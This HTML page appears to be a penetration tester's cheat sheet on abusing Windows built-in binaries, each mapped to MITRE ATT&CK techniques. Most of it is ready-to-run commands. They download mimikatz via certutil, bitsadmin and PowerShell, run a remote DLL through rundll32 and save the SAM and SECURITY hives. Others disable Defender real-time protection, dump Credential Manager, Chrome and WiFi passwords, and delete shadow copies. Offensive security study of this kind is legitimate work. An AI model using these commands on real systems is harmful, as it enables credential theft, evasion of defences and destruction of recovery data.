<!DOCTYPE html>
<html>
<head>
<title>lolbin</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: "Open Sans", "JetBrains Mono", sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
</head>
<body>
<h1>Windows Living off the land - Binaries (LOLBIN)</h1>
<hr />
<h2>Abusing rundll32.exe</h2>
<h3>Mitre ATT&amp;CK Summary</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Defense Evasion</td>
	<td align="center">T1218.011D</td>
	<td align="center">System Binary Proxy Execution</td>
	<td align="center">System Binary Proxy Execution: Rundll32</td>
	<td align="center">Anti-virus, Application control, Digital Certificate Validation</td>
</tr>
</tbody>
</table>
<h3>Examples</h3>
<p>For a good list of DLLs and API calls see:</p>
<p><a href="https://malapi.io/">https://malapi.io/</a></p>
<p>For more examples see also:</p>
<p><a href="https://www.tenforums.com/tutorials/77458-rundll32-commands-list-windows-10-a.html">https://www.tenforums.com/tutorials/77458-rundll32-commands-list-windows-10-a.html</a></p>
<p><a href="https://www.thewindowsclub.com/rundll32-shortcut-commands-windows">https://www.thewindowsclub.com/rundll32-shortcut-commands-windows</a></p>
<p><a href="https://www.elevenforum.com/t/complete-list-of-rundll32-commands-in-windows-11.17062/">https://www.elevenforum.com/t/complete-list-of-rundll32-commands-in-windows-11.17062/</a></p>
<pre><code>    rundll32.exe &lt;DLL_PATH&gt;,&lt;DLL_ENRTY_POINT&gt;
    run32dll32.exe \\192.168.4.25\mdll\malware.dll,do_bad_stuff
Examples:
To clear browsing history:
    rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 255
To lock PC
    rundll32.exe user32.dll,LockWorkStation
To start firewall GUI
    rundll32.exe shell32.dll,Control_RunDLL firewall.cpl
</code></pre>

<h2>Abusing certutil.exe</h2>
<h3>Mitre ATT&amp;CK Summary</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Command and Control</td>
	<td align="center">T1105</td>
	<td align="center">Ingress Tool Transfer</td>
	<td align="center">S0160</td>
	<td align="center">N/A</td>
</tr>
</tbody>
</table>
<h3>Examples</h3>
<pre><code>certutil -urlcache -f https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe mimikatz64.exe
To encode at server:
    certutil -encode mimikatz64.exe mimikatz64_enc.exe
To decode at target:
    certutil -decode mimikatz64_enc.exe mimikatz64_dec.exe
</code></pre>

<h2>Abusing bitsadmin.exe</h2>
<h3>Mitre ATT&amp;CK Summary</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Command and Control</td>
	<td align="center">T1105</td>
	<td align="center">Ingress Tool Transfer</td>
	<td align="center">S0190</td>
	<td align="center">N/A</td>
</tr>
</tbody>
</table>
<h3>Examples</h3>
<pre><code>bitsadmin /list
bitsadmin /create hacker
bitsadmin /addfile hacker https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe &quot;D:\Penetration Tests\Tests\b_scratchpad\01_script_dev\mimikatz64.exe&quot;
bitsadmin /list /verbose
bitsadmin /resume hacker
bitsadmin /complete hacker
bitsadmin /reset
bitsadmin /list /verbose
</code></pre>

<h2>Abusing conhost.exe</h2>
<h3>Mitre ATT&amp;CK Summary</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Privilege Escalation</td>
	<td align="center">T1068</td>
	<td align="center">Exploitation for Privilege Escalation</td>
	<td align="center">N/A</td>
	<td align="center">N/A</td>
</tr>
</tbody>
</table>
<h3>Examples</h3>
<pre><code>conhost calc.exe
conhost --headless calc.exe
</code></pre>

<h2>Abusing mshta.exe</h2>
<h3>Mitre ATT&amp;CK Summary</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Defense Evasion</td>
	<td align="center">T1218.005</td>
	<td align="center">System Binary Proxy Execution</td>
	<td align="center">System Binary Proxy Execution: Mshta</td>
	<td align="center">Application control, Digital Certificate Validation</td>
</tr>
</tbody>
</table>
<h3>Examples</h3>
<pre><code>mshta.exe myapp.hta
</code></pre>

<h2>Abusing reg.exe</h2>
<h3>Mitre ATT&amp;CK Summary</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Persistence, Privilege Escalation</td>
	<td align="center">T1547.001</td>
	<td align="center">Boot or Logon Autostart Execution:</td>
	<td align="center">Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</td>
	<td align="center">N/A</td>
</tr>
</tbody>
</table>
<h3>Examples</h3>
<pre><code>Export SAM and SECURITY
    reg save HKLM\SAM &quot;D:\Penetration Tests\Tests\b_scratchpad\01_script_dev\SAM&quot;
    reg save HKLM\SECURITY &quot;D:\Penetration Tests\Tests\b_scratchpad\01_script_dev\SECURITY&quot;

Disable defender real time protection
    reg add &quot;HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\real-Time Protection&quot; /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

Query current setting
    reg query &quot;HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\real-Time Protection&quot; /v DisableRealtimeMonitoring
</code></pre>

<h2>Abusing wscript.exe</h2>
<h3>Mitre ATT&amp;CK Summary</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Execution</td>
	<td align="center">T1059.005</td>
	<td align="center">Command and Scripting Interpreter</td>
	<td align="center">Command and Scripting Interpreter: Visual Basic</td>
	<td align="center">N/A</td>
</tr>
</tbody>
</table>
<h3>Examples</h3>
<p>In open_calc.vbs:</p>
<pre><code>'msgbox &quot;Click OK to run calculator&quot;
Set shell=CreateObject(&quot;wscript.shell&quot;)
Shell.Run(&quot;calc.exe&quot;)
</code></pre>

<p>From console/powershell:</p>
<pre><code>wscript open_calc.vbs
</code></pre>

<h2>Abusing powershell.exe</h2>
<h3>Mitre ATT&amp;CK Summary</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Execution</td>
	<td align="center">T1059.001</td>
	<td align="center">Command and Scripting Interpreter</td>
	<td align="center">Command and Scripting Interpreter: PowerShell</td>
	<td align="center">N/A</td>
</tr>
</tbody>
</table>
<h3>Examples</h3>
<p><a href="https://www.varonis.com/blog/powershell-for-pentesters">Basic introduction</a></p>
<p><a href="https://www.infosecmatter.com/powershell-commands-for-pentesters/">25 commands - some below</a></p>
<h3><em>Commonly used</em></h3>
<h3>Download mimikatz (remember to use 'raw' not 'blob'):</h3>
<pre><code>Invoke-WebRequest -Uri https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe -OutFile mimdld.exe
</code></pre>

<h3><em>Locating files with sensitive information</em></h3>
<h3>Find potentially interesting files</h3>
<pre><code>gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue
</code></pre>

<h3>Find credentials in Sysprep or Unattend files</h3>
<pre><code>gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue
</code></pre>

<h3>Find configuration files containing “password” string</h3>
<pre><code>gci c:\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern &quot;password&quot;
</code></pre>

<h3>Find database credentials in configuration files</h3>
<pre><code>gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern &quot;connectionString&quot;
</code></pre>

<h3>Locate web server configuration files</h3>
<pre><code>gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue
</code></pre>

<h3><em>Extracting credentials</em></h3>
<h3>Get stored passwords from Windows Credential Manager</h3>
<p>Requires the CredentialManager PowerShell module:</p>
<pre><code>Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine &quot;:&quot; ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); }
</code></pre>

<h3>Dump passwords from Google Chrome browser</h3>
<pre><code>[System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser))
</code></pre>

<h3>Get WiFI passwords:</h3>
<pre><code>(netsh wlan show profiles) | Select-String &quot;\:(.+)$&quot; | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=&quot;$name&quot; key=clear)}  | Select-String &quot;Key Content\W+\:(.+)$&quot; | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
</code></pre>

<h3>Search for SNMP community string in registry</h3>
<pre><code>gci HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse -EA SilentlyContinue
</code></pre>

<h3>Search for string pattern in registry</h3>
<p>The following PowerShell command will sift through the selected registry hives (HKCR, HKCU, HKLM, HKU, and HKCC) and recursively search for any chosen pattern within the registry key names or data values. In this case we are searching for the “password” pattern:</p>
<pre><code>$pattern = &quot;password&quot;
$hives = &quot;HKEY_CLASSES_ROOT&quot;,&quot;HKEY_CURRENT_USER&quot;,&quot;HKEY_LOCAL_MACHINE&quot;,&quot;HKEY_USERS&quot;,&quot;HKEY_CURRENT_CONFIG&quot;

# Search in registry keys
foreach ($r in $hives) { gci &quot;registry::${r}\&quot; -rec -ea SilentlyContinue | sls &quot;$pattern&quot; }

# Search in registry values
foreach ($r in $hives) { gci &quot;registry::${r}\&quot; -rec -ea SilentlyContinue | % { if((gp $_.PsPath -ea SilentlyContinue) -match &quot;$pattern&quot;) { $_.PsPath; $_ | out-string -stream | sls &quot;$pattern&quot; }}}
</code></pre>

<h3><em>Privilege escalation</em></h3>
<h3>Search registry for auto-logon credentials</h3>
<pre><code>gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select &quot;Default*&quot;
</code></pre>

<h3>Check if AlwaysInstallElevated is enabled</h3>
<pre><code>gp 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated
gp 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated
</code></pre>

<h3>Find unquoted service paths</h3>
<pre><code>gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq &quot;Auto&quot; -and $_.PathName -notlike &quot;C:\Windows*&quot; -and $_.PathName -notlike '&quot;*'} | select PathName,DisplayName,Name
</code></pre>

<h2>Abusing wmic.exe</h2>
<h3>Mitre ATT&amp;CK Summary</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Execution</td>
	<td align="center">T1047</td>
	<td align="center">Windows Management Instrumentation</td>
	<td align="center">N/A</td>
	<td align="center">N/A</td>
</tr>
</tbody>
</table>
<pre><code>wmic process call create calc.exe
wmic shadowcopy call create Volume=C:\

wmic /node:192.168.4.31 service where &quot;caption like '%sql server%'&quot; get Name,DisplayName,PathName,State,Status

$services = Get-WmiObject Win32_Service -Property Name,DisplayName,PathName | Select Name, DisplayName,PathName
$serviceList = New-Object System.Collections.ArrayList
Write-Host $serviceList
</code></pre>

<h2>Abusing rclone and vssadmin</h2>
<h3>Mitre ATT&amp;CK Summary - rclone.exe</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Exfiltration</td>
	<td align="center">T1567.002</td>
	<td align="center">Exfiltration Over Web Service</td>
	<td align="center">Exfiltration Over Web Service: Exfiltration to Cloud Storage</td>
	<td align="center">N/A</td>
</tr>
</tbody>
</table>
<h3>Mitre ATT&amp;CK Summary - vssadmin.exe</h3>
<table>
<thead>
<tr>
	<th align="center">Tactic</th>
	<th align="center">Technique ID</th>
	<th align="center">Technique Name</th>
	<th align="center">Sub-technique Name</th>
	<th align="center">Defense Bypassed</th>
</tr>
</thead>
<tbody>
<tr>
	<td align="center">Discovery,Impact</td>
	<td align="center">T1082,T1490</td>
	<td align="center">System Information Discovery,Inhibit System Recovery</td>
	<td align="center">N/A</td>
	<td align="center">N/A</td>
</tr>
</tbody>
</table>
<h3>Examples</h3>
<pre><code>vssadmin.exe delete shadows /all /quiet
C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete
</code></pre>


</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
